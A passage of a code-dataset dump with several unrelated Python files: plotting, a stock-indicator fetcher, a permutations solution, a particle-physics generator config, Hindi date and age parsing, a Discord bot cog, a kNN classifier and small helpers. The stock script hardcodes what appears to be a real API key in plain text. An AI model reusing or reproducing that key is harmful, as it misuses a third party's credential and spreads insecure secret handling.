beta_dist(loc=2.0, scale=5.0)\n\nfig, ax = plt.subplots(1, 1)\nplt.axis([0.0, 1.0, 0.0, 2.5])\nax.set_autoscale_on(False)\n\nx = np.linspace(0.01, 1.0, 200)\nplt.plot(x, bta1.pdf(x), 'r-', lw=1, alpha=0.8, label='beta (0.5,0.5)')\nplt.plot(x, bta2.pdf(x), 'm-', lw=1, alpha=0.8, label='beta (5,1)')\nplt.plot(x, bta3.pdf(x), 'g-', lw=1, alpha=0.8, label='beta (1,3)')\nplt.plot(x, bta4.pdf(x), 'k-', 
lw=1, alpha=0.8, label='beta (2,2)')\nplt.plot(x, bta5.pdf(x), 'y-', lw=1, alpha=0.8, label='beta (2,5)')\n\n# legend\nlegend = plt.legend(loc='upper right')\nplt.xlabel('x')\nplt.ylabel('pdf')\nplt.title('pdf of Beta Distribution')\nplt.show()\n","sub_path":"distributions/beta_dist.py","file_name":"beta_dist.py","file_ext":"py","file_size_in_byte":1398,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"470452336","text":"import pandas as pd\nfrom twelvedata import TDClient\n\nAPI_KEY = '228c71b89637460fb89a723c380d16ff'\nTICKER = 'AAPL'\nTIME_INTERVAL = '1min'\n\ntd = TDClient(apikey=API_KEY)\n\n#Change the symbol of the ticker here\nts = td.time_series(\n symbol= TICKER,\n interval= TIME_INTERVAL,\n timezone=\"America/New_York\"\n)\n\ndata= ts.with_macd().with_macd(fast_period=10).with_stoch().as_pandas()\n\ndef get_data():\n return { \"datetime\": data['datetime'], \"macd\": data['macd_1'], \"macd_signal\": data['macd_signal_1'], \"macd_hist\": data['macd_hist_1'] }","sub_path":"Task3/twelvedata_api/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":540,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"385639938","text":"class Solution:\n def permuteUnique(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: List[List[int]]\n \"\"\"\n res=[]\n nums.sort()\n self.dfs(res, nums, 0)\n return res\n \n def dfs(self, res, nums, start):\n if start==len(nums):\n res.append(nums)\n return\n \n for i in range(start, len(nums)):\n if i!=start and nums[i]==nums[start]: continue\n nums[start], nums[i]=nums[i], nums[start]\n self.dfs(res, list(nums), start+1)\n","sub_path":"python/permutations-ii.py","file_name":"permutations-ii.py","file_ext":"py","file_size_in_byte":552,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"470120321","text":"import FWCore.ParameterSet.Config as cms\n\nfrom Configuration.Generator.PythiaUESettings_cfi import *\n\nprocess = cms.Process(\"TEST\")\nprocess.load(\"FWCore.Framework.test.cmsExceptionsFatal_cff\")\nprocess.load(\"SimGeneral.HepPDTESSource.pythiapdt_cfi\")\n#process.load(\"SimGeneral.HepPDTESSource.pdt_cfi\")\n\nprocess.load(\"Configuration.StandardSequences.Services_cff\")\n\nprocess.maxEvents = cms.untracked.PSet(\n input = cms.untracked.int32(100)\n )\n\n\nprocess.RandomNumberGeneratorService = cms.Service(\n \"RandomNumberGeneratorService\",\n generator = cms.PSet(\n initialSeed = cms.untracked.uint32(123456789),\n engineName = cms.untracked.string('HepJamesRandom')\n )\n )\n\nprocess.randomEngineStateProducer = cms.EDProducer(\"RandomEngineStateProducer\")\n\n# The following three lines reduce the clutter of repeated printouts\n# of the same exception message.\nprocess.load(\"FWCore.MessageLogger.MessageLogger_cfi\")\nprocess.MessageLogger.destinations = ['cerr']\nprocess.MessageLogger.statistics = []\nprocess.MessageLogger.fwkJobReports = []\n\n#process.maxEvents = cms.untracked.PSet(input = cms.untracked.int32(50))\n\nprocess.source = cms.Source(\"LHESource\",\n fileNames = cms.untracked.vstring('file:/tmp/bianchi/fermi_events.lhe')\n)\n\nprocess.generator = cms.EDFilter(\n \"Pythia6HadronizerFilter\",\n pythiaHepMCVerbosity = cms.untracked.bool(True),\n maxEventsToPrint = cms.untracked.int32(0),\n pythiaPylistVerbosity = cms.untracked.int32(1),\n comEnergy = cms.double(7000.0),\n PythiaParameters = cms.PSet(\n pythiaUESettingsBlock,\n processParameters = cms.vstring('MSEL=0 
! User defined processes', \n 'PMAS(5,1)=4.4 ! b quark mass',\n 'PMAS(6,1)=172.4 ! t quark mass',\n 'MSTJ(1)=1 ! Fragmentation/hadronization on or off',\n 'MSTP(61)=1 ! Parton showering on or off'),\n # This is a vector of ParameterSet names to be read, in this order\n parameterSets = cms.vstring('pythiaUESettings', \n 'processParameters')\n ),\n jetMatching = cms.untracked.PSet(\n scheme = cms.string(\"Madgraph\"),\n mode = cms.string(\"auto\"),\t# soup, or \"inclusive\" / \"exclusive\"\n MEMAIN_etaclmax = cms.double(5.0),\n MEMAIN_qcut = cms.double(15.0),\n MEMAIN_minjets = cms.int32(0),\n MEMAIN_maxjets = cms.int32(5),\n MEMAIN_showerkt= cms.double(1),\n MEMAIN_excres = cms.string(\"\"),\n outTree_flag = cms.int32(0) \n ) \n )\n\nprocess.GEN = cms.OutputModule(\n \"PoolOutputModule\",\n fileName = cms.untracked.string('testMyProcess.root'),\n SelectEvents = cms.untracked.PSet(SelectEvents = cms.vstring('p'))\n)\n\nprocess.p = cms.Path(process.generator)\nprocess.p1 = cms.Path(process.randomEngineStateProducer)\nprocess.outpath = cms.EndPath(process.GEN)\n\nprocess.schedule = cms.Schedule(process.p, process.p1, process.outpath)\n","sub_path":"Utilities/test/Py6HadFilter_mgmatching_cfg.py","file_name":"Py6HadFilter_mgmatching_cfg.py","file_ext":"py","file_size_in_byte":2950,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"447065004","text":"import datetime\nimport difflib\nimport json\nimport os\nimport re\nimport sys\n\nimport textdistance as td\n\nfrom dateparser.search import search_dates\nfrom dateutil.relativedelta import relativedelta\n\ndef get_digits(word):\n if not re.search('\\d+', word):\n # no digits from 0-9\n if not re.search('[०१२३४५६७८९]+', word):\n return -1\n return re.search('[०१२३४५६७८९]+', word).group()\n return re.search('\\d+', word).group()\n\ndef get_month(sent): # Similar to get education\n thresh = 0.65\n possible_words = {'शून्य':0,'एक':1,'दो':2,'तीन':3,'चार':4,'पांच':5,'छः':6,'सात':7,'आठ':8,'नौ':9,'लास्ट':9,'पहला':1,\n 'दूसरा':2,'तीसरा':3,'चौथा':4,'पांचवा':5,'छत्ता':6,'चट्टा':6,'सातवा':7,'आठवा':8,'नौंवा':9,'नवा':9,'शुरू':1,\n 'नाना':9}\n suffix = ['वी','टी','वा']\n general_words = {'हां':1,'हाँ':1,'सब':9,'नहीं':0,'ना':0}\n\n sent = sent.strip()\n words = sent.split()\n for word in words:\n digits = get_digits(word)\n if digits != -1:\n return int(digits)\n for pos_word in possible_words:\n if td.levenshtein.normalized_similarity(pos_word, word) >= thresh:\n return possible_words[pos_word]\n elif td.levenshtein.normalized_similarity(pos_word+suffix[0], word) >= thresh\\\n or td.levenshtein.normalized_similarity(pos_word+suffix[1], word) >= thresh\\\n or td.levenshtein.normalized_similarity(pos_word+suffix[2], word) >= thresh:\n return possible_words[pos_word]\n for gen_word in general_words:\n if gen_word == word: # It is better to have exact match here\n# print(word, gen_word)\n return general_words[gen_word]\n return -1\n\n\n# This function returns 1 for haa, 0 for na and -1 if none present\ndef findYesNo(sentence):\n yesList = ['हां','हाँ']\n noList = [ 'नहीं' , 'ना']\n ans = -1\n for word in sentence.split():\n if word in yesList:\n ans = 1\n break\n elif word in noList:\n ans = 0\n break\n else:\n continue\n \n if ans == -1:\n yesMatchList, noMatchList = [], []\n for word in sentence.split():\n yesMatchList.append(difflib.get_close_matches(word, yesList))\n noMatchList.append(difflib.get_close_matches(word, noList))\n \n if len(noMatchList)!=0 and len(yesMatchList) != 0:\n ans = -1\n elif 
len(noMatchList)!=0 :\n ans = 0\n elif len(yesMatchList)!=0 :\n ans = 1\n return ans\n else:\n return ans\n\n\ndef findDate(sentence):\n outSentence = {'Date':'-1','Month':'-1','Year':'-1'}\n\n rawMonths=['जनवरी','फरवरी','मार्च','अप्रैल','मई','जून','जुलाई','अगस्त','सितंबर','अक्टूबर','नवंबर','दिसंबर']\n hindiMonths=['चैत्र','बैसाख','ज्येष्ठ','आषाढ़','सावन','भाद्रपद','आश्विन','कार्तिक','अग्रहायण','पौष','माघ','फाल्गुन']\n hindiMonthsDict = {i:j for (j,i) in enumerate(hindiMonths)}\n hindiMonthPrefix=['पहला','दूसरा','तीसरा','चौथा','पांचवां','छठा','सातवां','आठवां','नौवां','दसवां','ग्यारहवां','बारहवां']\n hindiMonthPrefixDict = {i:j for (j,i) in enumerate(hindiMonthPrefix)}\n\n #Now for date and month\n flag=0\n for month in rawMonths:\n if month in sentence:\n outSentence['Month']=month\n flag=1\n break\n\n #Now checking for months in hindi\n if flag==0:\n for month in hindiMonths:\n if month in sentence:\n outSentence['Month']=month #rawMonths[hindiMonthsDict[month]]\n flag=1\n break\n\n item=sentence.replace(\"-\",\" \").split()\n\n #Now for hindi prefix like pehla mahina, dusra mahine, teesra mahina and continued till 12th months\n\n if(len(item)>=2):\n for i in range(len(item)-1):\n if item[i] in hindiMonthPrefix and (item[i+1]=='महीना' or item[i+1] == \"महिना\"):\n if flag==0:\n outSentence['Month'] = rawMonths[hindiMonthPrefixDict[item[i]]] #item[i]\n flag=1\n break\n\n# total+=len(item)\n\n #For Months\n if(len(item)>=2):\n for i in range(len(item)-1):\n if item[i].isdigit() and item[i+1].isdigit() and len(item[i])!=4 and len(item[i+1])!=4:\n if flag==0:\n if (int(item[i+1])) <= 12:\n outSentence['Month'] = rawMonths[int(item[i+1])-1] #item[i+1]\n flag=1\n break\n elif item[i].isdigit() and item[i+1].isdigit() and len(item[i])!=4 and len(item[i+1])==4:\n if flag==0:\n if len(item[i])==1 and int(item[i])!=0:\n outSentence['Month'] = rawMonths[int(item[i])-1] #item[i]\n flag=1\n break\n elif len(item[i])==3:\n if int(item[i][:2]) <= 31 and int(item[i][2]) != 0:\n outSentence['Month'] = rawMonths[int(item[i][2])-1] #item[i][2]\n flag = 1\n break\n elif int(item[i][:2]) <= 31 and int(item[i][2]) == 0:\n if int(item[i][1])==1:\n outSentence['Month'] = rawMonths[int(item[i][1:])-1] #item[i][1:]\n flag = 1\n break\n elif len(item[i])==2:\n if int(item[i])<=12:\n outSentence['Month'] = rawMonths[int(item[i])-1] #item[i]\n flag=1\n break\n else:\n outSentence['Month'] = rawMonths[int(item[i][1])-1] #item[i][1]\n flag = 1\n break\n else:\n z = 2 #dummy\n\n elif item[i].isdigit() and item[i+1].isdigit() and len(item[i])==4 and len(item[i+1])==4:\n if flag==0:\n if int(item[i+1]) <= 2100 and int(item[i+1]) >= 1900:\n if int(item[i][2:]) <= 12:\n outSentence['Month'] = rawMonths[int(item[i][2:])-1] #item[i][2:]\n flag = 1\n break\n else:\n z=2 #Dummy\n\n# if truthMonths[-1]==1:\n# trainMonthOut.append(1)\n# else:\n# trainMonthOut.append(0)\n\n flagDate=0\n if len(item)>=2:\n for i in range(len(item)-1):\n if item[i].isdigit() and item[i+1].isdigit() and len(item[i])!=4 and len(item[i+1])!=4:\n if flagDate==0:\n outSentence['Date'] = item[i]\n flagDate=1\n break\n elif item[i].isdigit() and len(item[i])!=4 and not item[i+1].isdigit() and int(item[i])<32:\n if flagDate==0:\n suppList = [\"साल\",\"महीना\",\"महिना\"]\n if not(item[i+1] in suppList):\n outSentence['Date'] = item[i]\n flagDate=1\n break\n elif item[i].isdigit() and item[i+1].isdigit() and len(item[i])!=4 and len(item[i+1])==4:\n if flagDate==0:\n if len(item[i])==3:\n if int(item[i][:2]) <= 31 and int(item[i][2]) != 0:\n 
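# A 3-digit token followed by a 4-digit year: read the first two digits as the day when they form a valid day (<=31) and the trailing digit is a nonzero month.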
outSentence['Date'] = item[i][:2]\n flagDate = 1\n break\n elif int(item[i][:2]) <= 31 and int(item[i][2]) == 0:\n if int(item[i][1])==1:\n outSentence['Date'] = item[i][0]\n flagDate = 1\n break\n elif len(item[i])==2:\n if int(item[i])<=12:\n z = 2 #Do nothing\n else:\n outSentence['Date'] = item[i][0]\n flagDate = 1\n break\n else:\n z = 2 #dummy\n elif item[i].isdigit() and item[i+1].isdigit() and len(item[i])==4 and len(item[i+1])==4:\n if flagDate==0:\n if int(item[i+1]) <= 2100 and int(item[i+1]) >= 1900:\n if int(item[i][2:]) <= 12:\n outSentence['Date'] = item[i][:2]\n flagDate = 1\n break\n else:\n z=2\n elif len(item) == 1:\n try:\n if type(int(item[0]))==int:\n if int(item[0]) <= 31:\n outSentence['Date'] = item[0]\n flagDate = 1\n except:\n z = 2 # Basically do nothing\n\n ##############################################################################################\n flagYear=0\n for items in sentence.replace(\"-\",\" \").split():\n try:\n if len(items) == 4 and int(items) > 1900 and int(items) < 2100:\n outSentence['Year'] = items\n flagYear=1\n break\n except:\n z=2 #Dummy z\n if flagYear!=1:\n words = sentence.replace(\"-\",\" \").split()\n for i in range(len(words)-2):\n try:\n if (type(int(words[i])) == int) and (type(int(words[i+1]))==int) and (type(int(words[i+2]))==int):\n if len(words[i+2])==2:\n if int(words[i+2]) > 50:\n outSentence['Year'] = \"19\"+words[i+2]\n else:\n outSentence['Year'] = \"20\"+words[i+2]\n flagYear = 1\n break\n except:\n z=2\n if flagYear!=1:\n words = sentence.replace(\"-\",\" \").split()\n for i in range(len(words)-1):\n if words[i] in rawMonths or words[i] in hindiMonths or words[i] in hindiMonthPrefix:\n if words[i+1].isdigit() and len(words[i+1])==2:\n if int(words[i+1])>=50:\n outSentence['Year'] = \"19\"+str(words[i+1])\n else:\n outSentence['Year'] = \"20\"+str(words[i+1])\n flagYear =1\n break\n\n# json_Output = json.dumps(outSentence,ensure_ascii=False)\n return outSentence\n \n\ndef preprocess_date(sent):\n thresh = 0.80\n hi_nums = ['शून्य','एक','दो','तीन','चार','पांच','छः','सात','आठ','नौ','दस','ग्यारह','बारह','तेरह','चौदह',\n 'पंद्रह','सोलह','सत्रह','अट्ठारह','उन्निस','बीस','इक्कीस','बाईस','तेईस','चौबीस','पच्चीस','छब्बीस','सत्ताईस','अट्ठाईस','उनतीस','���ीस','इकतीस',\n 'बत्तीस','तैंतीस','चौंतीस','पैंतीस','छ्त्तीस','सैंतीस','अड़तीस','उनतालीस','चालीस','इकतालीस','बयालीस','तैंतालीस','चौंतालीस',\n 'पैंतालीस','छियालीस','सैंतालीस','अड़तालीस','उनचास','पचास','इक्याबन','बावन','तिरेपन','चौबन','पचपन','छप्पन','सत्तावन',\n 'अट्ठावन','उनसठ','साठ','इकसठ','बासठ','तिरसठ','चौंसठ','पैंसठ','छियासठ','सड़सठ','अड़सठ','उनहत्तर','सत्तर','इकहत्तर',\n 'बहत्तर','तिहत्तर','चौहत्तर','पचहत्तर','छिहत्तर','सतहत्तर','अठहत्तर','उनासी','अस्सी','इक्यासी','बयासी','तिरासी','चौरासी',\n 'पचासी','छियासी','सतासी','अठासी' ,'नवासी','नब्बे','इक्यानबे','बानवे','तिरानवे','चौरानवे','पचानवे','छियानवे','सत्तानवे',\n 'अट्ठानवे','निन्यानवे' ,'सौ']\n \n pos_words = {'डेढ़':'1 साल 6 महीना', 'ढाई':'2 साल 6 महीना','डाइट':'2 साल 6 महीना', 'चार्ट':'साल', 'वर्स':'साल',\n 'वर्ष':'साल', 'नव':'9','नाना':'9', 'चैप्टर':'4', 'वाट':'साल'}\n \n words = sent.split(' ')\n out_sent = []\n for idx, word in enumerate(words): \n for pw_idx, pos_word in enumerate(hi_nums):\n if td.levenshtein.normalized_similarity(pos_word, word) >= thresh:\n words[idx] = str(pw_idx)\n for pos_word in pos_words:\n if td.levenshtein.normalized_similarity(pos_word, word) >= thresh:\n words[idx] = pos_words[pos_word]\n \n words = ' '.join(words)\n# print(words)\n return words\n\n\ndef get_age(sent):\n curr_date = 
datetime.datetime.now()\n\n sent = preprocess_date(sent)\n out = search_dates(sent)\n if out == None and re.search('\\d+', sent) != None:\n idx = re.search('\\d+', sent).end()\n out = search_dates(sent[:idx]+' साल'+sent[idx:])\n out_date = []\n age = []\n if out != None:\n for o in out:\n out_date.append(str(o[1].year) + ' years ' + str(o[1].month) + ' months ' + str(o[1].day) + ' days')\n age_diff = relativedelta(curr_date.date(),o[1].date())\n age.append(str(age_diff.years) + ' years ' + str(age_diff.months) + ' months ' + str(age_diff.days) + ' days ')\n return age\n","sub_path":"voice_survey_android_app/voicebotserver/vsurvey/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":15220,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"524627502","text":"import asyncio\nimport os\nimport random\nimport sys\n\nimport aiohttp\nimport discord\nimport yaml\nfrom discord.ext import commands\nfrom discord.ext.commands import BucketType\n\nif not os.path.isfile(\"config.yaml\"):\n sys.exit(\"'config.yaml' not found! Please add it and try again.\")\nelse:\n with open(\"config.yaml\") as file:\n config = yaml.load(file, Loader=yaml.FullLoader)\n\n\nclass Fun(commands.Cog, name=\"fun\"):\n def __init__(self, bot):\n self.bot = bot\n\n \"\"\"\n Why 1 and 86400?\n -> Because the user should be able to use the command *once* every *86400* seconds\n \n Why BucketType.user?\n -> Because the cool down only affects the current user, if you want other types of cool downs, here are they:\n - BucketType.default for a global basis.\n - BucketType.user for a per-user basis.\n - BucketType.server for a per-server basis.\n - BucketType.channel for a per-channel basis.\n \"\"\"\n\n @commands.command(name=\"dailyfact\")\n @commands.cooldown(1, 86400, BucketType.user)\n async def dailyfact(self, context):\n \"\"\"\n Get a daily fact, command can only be ran once every day per user.\n \"\"\"\n # This will prevent your bot from stopping everything when doing a web request - see: https://discordpy.readthedocs.io/en/stable/faq.html#how-do-i-make-a-web-request\n async with aiohttp.ClientSession() as session:\n async with session.get(\"https://uselessfacts.jsph.pl/random.json?language=en\") as request:\n if request.status == 200:\n data = await request.json()\n embed = discord.Embed(description=data[\"text\"], color=config[\"main_color\"])\n await context.send(embed=embed)\n else:\n embed = discord.Embed(\n title=\"Error!\",\n description=\"There is something wrong with the API, please try again later\",\n color=config[\"error\"]\n )\n await context.send(embed=embed)\n # We need to reset the cool down since the user didn't got his daily fact.\n self.dailyfact.reset_cooldown(context)\n\n @commands.command(name=\"rps\")\n async def rock_paper_scissors(self, context):\n choices = {\n 0: \"rock\",\n 1: \"paper\",\n 2: \"scissors\"\n }\n reactions = {\n \"🪨\": 0,\n \"🧻\": 1,\n \"✂\": 2\n }\n embed = discord.Embed(title=\"Please choose\", color=config[\"warning\"])\n embed.set_author(name=context.author.display_name, icon_url=context.author.avatar_url)\n choose_message = await context.send(embed=embed)\n for emoji in reactions:\n await choose_message.add_reaction(emoji)\n\n def check(reaction, user):\n return user == context.message.author and str(reaction) in reactions\n\n try:\n reaction, user = await self.bot.wait_for(\"reaction_add\", timeout=10, check=check)\n\n user_choice_emote = reaction.emoji\n user_choice_index = reactions[user_choice_emote]\n\n 
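# The bot samples its move uniformly at random from the same emoji-to-index map used for the player's reaction.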
bot_choice_emote = random.choice(list(reactions.keys()))\n bot_choice_index = reactions[bot_choice_emote]\n\n result_embed = discord.Embed(color=config[\"success\"])\n result_embed.set_author(name=context.author.display_name, icon_url=context.author.avatar_url)\n await choose_message.clear_reactions()\n\n if user_choice_index == bot_choice_index:\n result_embed.description = f\"**That's a draw!**\\nYou've chosen {user_choice_emote} and I've chosen {bot_choice_emote}.\"\n result_embed.colour = config[\"warning\"]\n elif user_choice_index == 0 and bot_choice_index == 2:\n result_embed.description = f\"**You won!**\\nYou've chosen {user_choice_emote} and I've chosen {bot_choice_emote}.\"\n result_embed.colour = config[\"success\"]\n elif user_choice_index == 1 and bot_choice_index == 0:\n result_embed.description = f\"**You won!**\\nYou've chosen {user_choice_emote} and I've chosen {bot_choice_emote}.\"\n result_embed.colour = config[\"success\"]\n elif user_choice_index == 2 and bot_choice_index == 1:\n result_embed.description = f\"**You won!**\\nYou've chosen {user_choice_emote} and I've chosen {bot_choice_emote}.\"\n result_embed.colour = config[\"success\"]\n else:\n result_embed.description = f\"**I won!**\\nYou've chosen {user_choice_emote} and I've chosen {bot_choice_emote}.\"\n result_embed.colour = config[\"error\"]\n await choose_message.add_reaction(\"🇱\")\n await choose_message.edit(embed=result_embed)\n except asyncio.exceptions.TimeoutError:\n await choose_message.clear_reactions()\n timeout_embed = discord.Embed(title=\"Too late\", color=config[\"error\"])\n timeout_embed.set_author(name=context.author.display_name, icon_url=context.author.avatar_url)\n await choose_message.edit(embed=timeout_embed)\n\n\ndef setup(bot):\n bot.add_cog(Fun(bot))\n","sub_path":"cogs/fun.py","file_name":"fun.py","file_ext":"py","file_size_in_byte":5210,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"330184625","text":"#===============================================================================\n# Copyright 2012 Jake Ross\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#===============================================================================\n\n#============= enthought library imports =======================\nfrom traits.api import Str, List, Instance\nfrom traitsui.api import View, Item\n#============= standard library imports ========================\n#============= local library imports ==========================\nfrom src.loggable import Loggable\nfrom src.arar.nodes.experiment import ExperimentNode\nimport os\nfrom src.graph.graph import Graph\nfrom src.database.core.database_adapter import DatabaseAdapter\n\n\nclass ArArWorkspace(Loggable):\n name = Str('Workspace')\n experiments = List(ExperimentNode)\n root = Str\n current_experiment = Instance(ExperimentNode)\n db = Instance(DatabaseAdapter)\n\n graph = Instance(Graph)\n\n def traits_view(self):\n v = View(\n Item('name', show_label=False, style='readonly'),\n )\n return 
v\n\n def init(self):\n self.info('initializing workspace {}'.format(self.root))\n if os.path.isdir(self.root):\n pass\n# if self.confirmation_dialog('Overwrite Directory {}'.format(self.root)):\n# pass\n else:\n os.mkdir(self.root)\n\n def new_experiment(self, name, kind):\n klass = '{}Node'.format(kind.capitalize())\n m = __import__('src.arar.nodes.{}'.format(kind), fromlist=[klass])\n cls = getattr(m, klass)\n exp = cls(name=name)\n self.current_experiment = exp\n self.experiments.append(exp)\n return exp\n\n def add_sample(self, sample):\n dbr = sample._db_result\n for ai in dbr.analyses:\n self._add_analysis(ai)\n\n def _add_analysis(self, ref):\n db = self.db\n exp = self.current_experiment\n irrad_pos = db.get_irradiation_position(ref.IrradPosition)\n#\n arar_analysis = ref.araranalyses[-1]\n rid = ref.RID\n kwargs = dict(\n sample=ref.sample.Sample,\n irradiation=irrad_pos.IrradiationLevel,\n age=arar_analysis.Age,\n age_err=arar_analysis.ErrAge\n )\n exp.load_analysis_reference(ref, rid, kwargs)\n\n exp.load_series_reference('airs', ref, rid, kwargs)\n\n\n def add_analyses(self, analyses):\n db = self.db\n for d in analyses:\n ref = db.get_analysis(d.rid)\n self._add_analysis(ref)\n\n# #refresh the plot\n# self._selected_changed()\n def has_node(self, node):\n if node in self.experiments:\n return True\n else:\n for exp in self.experiments:\n if exp.has_node(node):\n return True\n\n#===============================================================================\n# factories\n#===============================================================================\n def _graph_factory(self, shape):\n g = Graph(container_dict=dict(type='g',\n shape=shape,\n bgcolor='gray',\n padding=10\n ),\n )\n return g\n#===============================================================================\n# defaults\n#===============================================================================\n\n def _graph_default(self):\n return self._graph_factory((1, 1))\n#===============================================================================\n# views\n#===============================================================================\n# def configure_view(self):\n# v = View()\n# return v\n\n def graph_view(self):\n v = View(Item('graph',\n show_label=False,\n style='custom'))\n return v\n\n#============= EOF =============================================\n","sub_path":"src/zobs/arar/workspace.py","file_name":"workspace.py","file_ext":"py","file_size_in_byte":4562,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"522604011","text":"# Copyright 2021 BlobCity, Inc\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\n\n\"\"\"\nThis is a Custom Class to store Class reference data for YAML generation and process logging.\n\"\"\"\nclass DictClass:\n\n YAML=dict()\n ObjectExist= False\n ObjectList=None\n feature_importance=dict()\n def __int__(self):\n self.ObjectExist=False\n self.ObjectList=None\n self.YAML={}\n self.feature_importance=dict()\n def 
addKeyValue(self, key,value):\n \"\"\"\n param1:Class reference/Class object \n param2: String key\n param3: String value\n\n Function adds new key value pair into the class dictionary object\n \"\"\"\n self.YAML[key]=value\n\n def getdict(self):\n \"\"\"\n return : Dictionary \n\n Function returns the complete dictionary in current state\n \"\"\"\n return self.YAML\n\n def UpdateKeyValue(self,key,value):\n \"\"\"\n param1:class reference\n param2: String key\n param2: String /Dicionary\n\n Function updates a simple Dictionary Key value if the key exists else creates the entry\n \"\"\"\n if key in self.YAML.keys():\n self.YAML[key]=value\n else:\n DictClass.addKeyValue(self, key,value)\n\n def UpdateNestedKeyValue(self,key,key2,value):\n\n \"\"\"\n param1:Class reference\n param2:String key\n param3:String key\n param4:String/Dictionary\n\n Function Updates a nested Dictionary Value if the key exists else creates an entry for the key\n \"\"\"\n if key in self.YAML.keys():\n self.YAML[key][key2]=value\n else:\n self.YAML[key]={}\n self.YAML[key][key2]=value\n \n def resetVar(self):\n \"\"\"\n Function to reset class variables\n \"\"\"\n self.ObjectExist=False\n self.ObjectList=None\n self.YAML={}\n self.feature_importance={}\n \n","sub_path":"blobcity/store/DictClass.py","file_name":"DictClass.py","file_ext":"py","file_size_in_byte":2434,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"268582637","text":"import numpy as np\r\nimport math\r\nimport pandas as pd\r\nimport printData as PD_\r\n\r\n# k Nearest Neighbor algorithm\r\n# dfTrain : dataframe for training data\r\n# dfTest : dataframe for test data\r\n# dfTestWeight : weight of each test data column\r\n# caseWeight : weight by number of cases from training data\r\n# targetCol : target column for dfTrain\r\n# targetIndex : index for the target column\r\n# k : number of neighbors\r\n# useAverage : return average value\r\ndef kNN(dfTrain, dfTest, dfTestWeight, caseWeight, targetCol, targetIndex, k, useAverage):\r\n print('')\r\n print('+=======================+')\r\n print('| Function : kNN |')\r\n print('+=======================+')\r\n\r\n print('\\n<<< [17-before] dataFrame for training >>>')\r\n print(dfTrain)\r\n print('\\n<<< [18] dataFrame for test >>>')\r\n print(dfTest)\r\n\r\n # When using kNN, this is the final use of dfTrain and dfTest, so coverting of them does not cause any problem.\r\n # move target column of dfTrain to the most-right of dfTrain\r\n \r\n # find target column index of dfTrain\r\n cols = dfTrain.columns.tolist()\r\n targetColIndex = -1\r\n \r\n for i in range(len(cols)):\r\n if cols[i] == targetCol:\r\n targetColIndex = i\r\n break\r\n\r\n # move target column of dfTrain\r\n cols = cols[:targetColIndex] + cols[targetColIndex+1:] + [cols[targetColIndex]]\r\n dfTrain = dfTrain[cols]\r\n\r\n # count of each value for training data\r\n targetVals = list(set(dfTrain[targetCol].values)) # set of target values\r\n classCount = dfTrain[targetCol].value_counts() # class count for each target value\r\n\r\n print('\\n<<< [17-after] dataFrame for training >>>')\r\n print(dfTrain)\r\n\r\n # convert to numpy array\r\n dfTrain = np.array(dfTrain)\r\n dfTest = np.array(dfTest)\r\n \r\n # kNN classification result\r\n result = []\r\n resultT = [] # transport of result\r\n\r\n # if dfTestWeight is None, use equal weight for all test columns\r\n if dfTestWeight == None: dfTestWeight = [1]*len(dfTest[0])\r\n\r\n # mark the result using k-nearest neighbor\r\n for i in 
range(len(dfTest)): # for each test data\r\n if i % 10 == 0: print('test data ' + str(i))\r\n \r\n thisTestData = dfTest[i]\r\n\r\n # [distance between the test data and each training data, mark]\r\n distAndMark = []\r\n\r\n # for each training data\r\n for j in range(len(dfTrain)):\r\n \r\n thisTrainData = dfTrain[j]\r\n\r\n # calculate distance (using the weight) from the test data\r\n thisDistSquare = 0\r\n \r\n for l in range(len(dfTest[0])): # because test data contain all input columns\r\n\r\n if l == targetIndex: continue\r\n\r\n thisTestData[l] = float(thisTestData[l])\r\n thisTrainData[l] = float(thisTrainData[l])\r\n \r\n thisDistSquare = thisDistSquare + dfTestWeight[l] * pow(thisTestData[l] - thisTrainData[l], 2)\r\n\r\n # add to distAndMark (now, train output is at the right end of each training data row)\r\n distAndMark.append([math.sqrt(thisDistSquare), thisTrainData[len(thisTrainData)-1]])\r\n\r\n # sort distAndMark array\r\n distAndMark = sorted(distAndMark, key=lambda x:x[0], reverse=False)\r\n\r\n # count the vote for each class (using weight = len(dfTrain)/trainCount)\r\n vote = {} # vote result for each class: [class targetVals[j], vote score of targetVals[j]]\r\n for j in range(len(classCount)): vote[targetVals[j]] = 0 # initialize dictionary vote\r\n\r\n for j in range(k): # count the vote using k nearest neighbors\r\n thisMark = distAndMark[j][1] # mark of this 'neighbor'\r\n if caseWeight == True: vote[thisMark] = vote[thisMark] + len(dfTrain) / classCount[thisMark]\r\n else: vote[thisMark] = vote[thisMark] + 1\r\n\r\n # use average vote value\r\n if useAverage == True:\r\n sumOfVote = 0.0 # sum of (vote weight)\r\n sumOfKeyVal = 0.0 # sum of (key value)*(vote weight)\r\n \r\n for key in vote.keys():\r\n sumOfVote += float(vote[key])\r\n sumOfKeyVal += float(key) * float(vote[key])\r\n\r\n avgVoteVal = 